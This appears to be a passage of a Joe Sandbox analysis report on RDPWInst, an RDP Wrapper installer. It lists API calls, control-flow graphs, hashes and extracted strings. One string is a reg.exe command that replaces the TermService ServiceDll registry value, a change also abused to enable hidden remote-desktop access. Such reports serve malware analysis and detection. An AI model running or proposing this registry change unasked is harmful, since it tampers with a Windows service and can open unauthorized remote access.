                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00409048
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000), ref: 00409088
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090B3
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090D7
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,?,?,?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00409100
                                                                                                                                  • RegCloseKey.ADVAPI32(?,0040913B,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales), ref: 0040912E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: OpenQueryValue$CloseFileModuleNamelstrcpyn
                                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                                                                                                  • API String ID: 3482678030-345420546
                                                                                                                                  • Opcode ID: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                                                                                                  • Instruction ID: 299ddb9754ebd29522f96ae12af661ce277d6f97d31c05324fadffe1222b4d16
                                                                                                                                  • Opcode Fuzzy Hash: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                                                                                                  • Instruction Fuzzy Hash: CA510071B40209BEEB10EAA5CD46FAE77BCEB48704F504477B604F61C2D6B8AE408A5D

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A827
                                                                                                                                  • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A91D
                                                                                                                                    • Part of subcall function 00438860: RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                                                                                                    • Part of subcall function 00438860: RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CloseFlush
                                                                                                                                  • String ID: $sD$ImagePath$ServiceDll$[*] ImagePath: "$[*] ServiceDll: "$[-] Another third-party TermService library is installed.$[-] OpenKeyReadOnly error (code $[-] TermService is hosted in a custom application (BeTwin, etc.) - unsupported.$\SYSTEM\CurrentControlSet\Services\TermService$\SYSTEM\CurrentControlSet\Services\TermService\Parameters$rdpwrap.dll$svchost -k$svchost.exe$termsrv.dll
                                                                                                                                  • API String ID: 1149308822-2563127478
                                                                                                                                  • Opcode ID: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                                                                                                  • Instruction ID: 1ac512ede3db6dba28468dccd327cdb8adfd53dd4df03d49c6afb8088628474e
                                                                                                                                  • Opcode Fuzzy Hash: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                                                                                                  • Instruction Fuzzy Hash: 01515774B442005BD700FBBA8D4255EB2659F8930CB51A43FB840BB796CB3CEC158AAF

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000,004095BB), ref: 00408C46
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C6A
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C79
                                                                                                                                  • IsValidLocale.KERNEL32(00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000), ref: 00408C8D
                                                                                                                                  • EnterCriticalSection.KERNEL32(00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?), ref: 00408CEA
                                                                                                                                  • lstrcpynW.KERNEL32(en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540), ref: 00408D08
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00449B54,en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000), ref: 00408D12
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Leave$Enter$LocaleValidlstrcpyn
                                                                                                                                  • String ID: en-GB,en,en-US,
                                                                                                                                  • API String ID: 1058953229-3021119265
                                                                                                                                  • Opcode ID: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                                                                                                  • Instruction ID: 9b1ce77b3c0781b783b438d4c88a1dd796634ce3a4aca31124bb85a30b48e6d3
                                                                                                                                  • Opcode Fuzzy Hash: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                                                                                                  • Instruction Fuzzy Hash: B321AE203042556AEB50B77A9E57B6A2169EF4570CF60443FB481B72D2CEBCAC04E22E

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,0000061C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                                                                                                  • GetLastError.KERNEL32(00000001,00000000,0000061C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,0000061C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,0000061C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,0000061C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,0000061C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseErrorHandleLastProcess$OpenTerminate
                                                                                                                                  • String ID: $sD$[-] OpenProcess error (code $[-] TerminateProcess error (code
                                                                                                                                  • API String ID: 1809907545-775158141
                                                                                                                                  • Opcode ID: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                                                                                                  • Instruction ID: c032a40b630c9990863936c46c82d74717666648ea03c3b6a4bb658b84b7f9ba
                                                                                                                                  • Opcode Fuzzy Hash: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                                                                                                  • Instruction Fuzzy Hash: EB01F6A5B442111AE610B3FB0D82B2F255A8F8A75CF02917FB504B62D7CA3C9C11977F

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1434 40472c-404740 1435 404742-404743 1434->1435 1436 40474d-404763 1434->1436 1438 404765-404774 1435->1438 1439 404745-404746 1435->1439 1437 40478c-40479f 1436->1437 1443 4047a5-4047bd CreateFileW 1437->1443 1444 404857-404874 1437->1444 1442 404785 1438->1442 1440 404776-404780 1439->1440 1441 404748 1439->1441 1440->1442 1445 4048b5-4048b6 1441->1445 1442->1437 1448 4047c3-4047cb 1443->1448 1449 4048cb-4048d6 GetLastError 1443->1449 1446 404876-404878 1444->1446 1447 40487a-404880 1444->1447 1450 404888-404890 GetStdHandle 1446->1450 1451 404882-404884 1447->1451 1452 404886 1447->1452 1453 4047d1-4047df GetFileSize 1448->1453 1454 404894-40489a 1448->1454 1449->1445 1450->1449 1456 404892 1450->1456 1451->1450 1452->1450 1453->1449 1455 4047e5-4047ea 1453->1455 1457 4048b3 1454->1457 1458 40489c-4048a5 GetFileType 1454->1458 1459 4047ec 1455->1459 1460 4047ee-4047fb SetFilePointer 1455->1460 1456->1454 1457->1445 1461 4048b7-4048c9 CloseHandle 1458->1461 1462 4048a7-4048aa 1458->1462 1459->1460 1460->1449 1463 404801-40481d ReadFile 1460->1463 1461->1445 1462->1457 1464 4048ac 1462->1464 1463->1449 1465 404823 1463->1465 1464->1457 1466 404825-404827 1465->1466 1466->1454 1467 404829-404831 1466->1467 1468 404833-404834 1467->1468 1469 404836-404845 SetFilePointer 1467->1469 1468->1466 1469->1449 1470 40484b-404853 SetEndOfFile 1469->1470 1470->1449 1471 404855 1470->1471 1471->1454
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047B5
                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047D9
                                                                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047F5
                                                                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00404816
                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040483F
                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 0040484D
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00404888
                                                                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 0040489E
                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 004048B9
                                                                                                                                  • GetLastError.KERNEL32(000000F5), ref: 004048D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1694776339-0
                                                                                                                                  • Opcode ID: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                                                                                                  • Instruction ID: de0dc4671a2c55deed7a27a48df34c8c3110be8be3acd5b577aa359944728292
                                                                                                                                  • Opcode Fuzzy Hash: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                                                                                                  • Instruction Fuzzy Hash: EA4183B5500A40A9E730BF24C90972376E4EBC0714F20CE3FE692B66D0E7BDA845878D

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C37B
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C384
                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C3BB
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3C6
                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3CF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$CreateErrorLastObjectProcessSingleWait
                                                                                                                                  • String ID: $sD$D$[-] CreateProcess error (code:
                                                                                                                                  • API String ID: 1377960556-1026335874
                                                                                                                                  • Opcode ID: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                                                                                                  • Instruction ID: 1d017b2d671d3512e5dabab7732e068b99e5a835ee42228d460eb482b244bc14
                                                                                                                                  • Opcode Fuzzy Hash: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                                                                                                  • Instruction Fuzzy Hash: D21151B0644204AADB00F7E5CD82F9E77B89F49714F61453BF610F61D2D67CA910972E

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1496 403028-403037 1497 403120-403123 1496->1497 1498 40303d-403041 1496->1498 1501 403210-403214 1497->1501 1502 403129-403133 1497->1502 1499 403043-40304a 1498->1499 1500 4030a4-4030ad 1498->1500 1508 403078-40307a 1499->1508 1509 40304c-403057 1499->1509 1500->1499 1507 4030af-4030b8 1500->1507 1505 402ab4-402ad9 call 402a08 1501->1505 1506 40321a-40321f 1501->1506 1503 4030e4-4030f1 1502->1503 1504 403135-403141 1502->1504 1503->1504 1517 4030f3-4030fc 1503->1517 1512 403143-403146 1504->1512 1513 403178-403186 1504->1513 1525 402af5-402afc 1505->1525 1526 402adb-402aea VirtualFree 1505->1526 1507->1500 1516 4030ba-4030ce Sleep 1507->1516 1514 40307c-40308d 1508->1514 1515 40308f 1508->1515 1510 403060-403075 1509->1510 1511 403059-40305e 1509->1511 1520 40314a-40314e 1512->1520 1513->1520 1522 403188-40318d call 402884 1513->1522 1514->1515 1521 403092-40309f 1514->1521 1515->1521 1516->1499 1523 4030d4-4030df Sleep 1516->1523 1517->1503 1524 4030fe-403112 Sleep 1517->1524 1527 403190-40319d 1520->1527 1528 403150-403156 1520->1528 1521->1502 1522->1520 1523->1500 1524->1504 1530 403114-40311b Sleep 1524->1530 1535 402afe-402b1a VirtualQuery VirtualFree 1525->1535 1531 402af0-402af3 1526->1531 1532 402aec-402aee 1526->1532 1527->1528 1537 40319f-4031a6 call 402884 1527->1537 1533 4031a8-4031b2 1528->1533 1534 403158-403176 call 4028c4 1528->1534 1530->1503 1540 402b2f-402b31 1531->1540 1532->1540 1538 4031e0-40320d call 402924 1533->1538 1539 4031b4-4031dc VirtualFree 1533->1539 1542 402b21-402b27 1535->1542 1543 402b1c-402b1f 1535->1543 1537->1528 1548 402b33-402b43 1540->1548 1549 402b46-402b56 1540->1549 1542->1540 1547 402b29-402b2d 1542->1547 1543->1540 1547->1535 1548->1549
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,00000000,00402C9A), ref: 004030BE
                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,00402C9A), ref: 004030D8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                                                                                                  • Instruction ID: 8e11df8688fcfc32dba15f0401baaa5f3e1cf13b6ab2085a37f93781684c6a2f
                                                                                                                                  • Opcode Fuzzy Hash: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                                                                                                  • Instruction Fuzzy Hash: 9F7115312052009FD715CF69CE89726BFE4AB89315F14827FD444AB3D6D7B889458789

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,0043C716,?,?,?,00447324,00000000,00000000,00000000,?,00443BC6,00000000,00443FB2), ref: 0043C600
                                                                                                                                  Strings
                                                                                                                                  • \system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d ", xrefs: 0043C68F
                                                                                                                                  • $sD, xrefs: 0043C60D
                                                                                                                                  • " /f, xrefs: 0043C69A
                                                                                                                                  • [-] OpenKey error (code , xrefs: 0043C612
                                                                                                                                  • ServiceDll, xrefs: 0043C650
                                                                                                                                  • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C5EF
                                                                                                                                  • %SystemRoot%, xrefs: 0043C682
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: " /f$$sD$%SystemRoot%$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters$\system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "
                                                                                                                                  • API String ID: 1452528299-2956723230
                                                                                                                                  • Opcode ID: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                                                                                                  • Instruction ID: 86ae2d0f633f2b7d457566c29c3046f730a81976c8e7ce91198a0ccb689aa4bb
                                                                                                                                  • Opcode Fuzzy Hash: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                                                                                                  • Instruction Fuzzy Hash: B331DE74A04204AFDB10FB66CC82A2E77A5DB4D308F61A07BF800B7291CB3CAD049B5D
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00402C72), ref: 00402D5B
                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,00402C72), ref: 00402D71
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,00402C72), ref: 00402D9F
                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,?,?,00402C72), ref: 00402DB5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                                                                                                  • Instruction ID: 31c3f393645164f4675e576557a9223240219fe3669f0ad713ca74d6ded16897
                                                                                                                                  • Opcode Fuzzy Hash: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                                                                                                  • Instruction Fuzzy Hash: B4C147766052518FD715CF28DE8831ABBE0AB86314F1882BFD444BB3D5C7B89946CBD8
                                                                                                                                  APIs
